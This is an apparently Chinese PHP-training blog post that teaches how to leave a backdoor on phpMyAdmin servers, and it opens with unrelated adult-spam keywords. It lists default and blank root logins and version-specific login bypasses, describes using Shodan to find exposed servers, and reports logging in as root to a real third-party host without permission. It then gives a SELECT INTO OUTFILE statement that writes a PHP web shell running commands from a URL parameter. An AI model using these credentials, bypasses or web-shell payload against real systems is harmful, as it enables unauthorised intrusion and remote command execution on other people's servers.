欧美成人午夜免费全部完,亚洲午夜福利精品久久,а√最新版在线天堂,另类亚洲综合区图片小说区,亚洲欧美日韩精品色xxx

扣丁學(xué)堂PHP培訓(xùn)之phpMyAdmin通過密碼漏洞留后門文件

2018-11-28 14:26:38 1468瀏覽

今天扣丁學(xué)堂PHP培訓(xùn)老師給大家分享一篇關(guān)于phpMyAdmin通過密碼漏洞留后門文件的詳細(xì)介紹,希望對同學(xué)們有所幫助,請同學(xué)們謹(jǐn)慎留后門哦!

默認(rèn)phpMyAdmin:用戶名root密碼root或空登陸。

版本2.11.3~2.11.4:用戶名'localhost'@'@"登陸,無需密碼。

版本2.11.9.2:用戶名root登陸,無需密碼。

經(jīng)測試,第二個漏洞在phpMyAdmin3.5.1版本也是可行的。原理從略。

下面讓我們簡單的上網(wǎng)看看能不能找到一些存在這樣漏洞的登陸頁面。

祭出著名的漏洞搜索引擎Shodan并搜索phpMyAdmin。


先看看有沒有不需要密碼登陸的,逐一嘗試沒有后尋找名字中包含的版本號。這里我找到一個國內(nèi)的(浙江省·杭州市)。



地址已手動打碼。
http://121.***.*.219:80/


登陸成功(root權(quán)限)。



接下來你可以寫一個outfile到對方主機的網(wǎng)絡(luò)目錄下。俗稱“留后門”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后門文件的絕對路徑"

點擊運行,不出意外便在對方主機留下了一個名為runme.php的后門文件。

以上就是扣丁學(xué)堂PHP培訓(xùn)之phpMyAdmin通過密碼漏洞留后門文件的全部內(nèi)容了,希望本文的內(nèi)容對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,扣丁學(xué)堂有專業(yè)老師制定的PHP學(xué)習(xí)路線圖輔助學(xué)員學(xué)習(xí),此外還有與時俱進的PHP課程體系和PHP視頻直播課供大家學(xué)習(xí),想要學(xué)好PHP開發(fā)技術(shù)的小伙伴快快行動吧??鄱W(xué)堂PHP技術(shù)交流群:374332265。



【關(guān)注微信公眾號獲取更多學(xué)習(xí)資料】

 

查看更多關(guān)于“php培訓(xùn)資訊”的相關(guān)文章>>


標(biāo)簽: PHP培訓(xùn) PHP視頻教程 PHP在線視頻 PHP學(xué)習(xí)視頻

熱門專區(qū)

暫無熱門資訊

課程推薦

微信
微博
15311698296

全國免費咨詢熱線

郵箱:codingke@1000phone.com

官方群:148715490

北京千鋒互聯(lián)科技有限公司版權(quán)所有   北京市海淀區(qū)寶盛北里西區(qū)28號中關(guān)村智誠科創(chuàng)大廈4層
京ICP備2021002079號-2   Copyright ? 2017 - 2022
返回頂部 返回頂部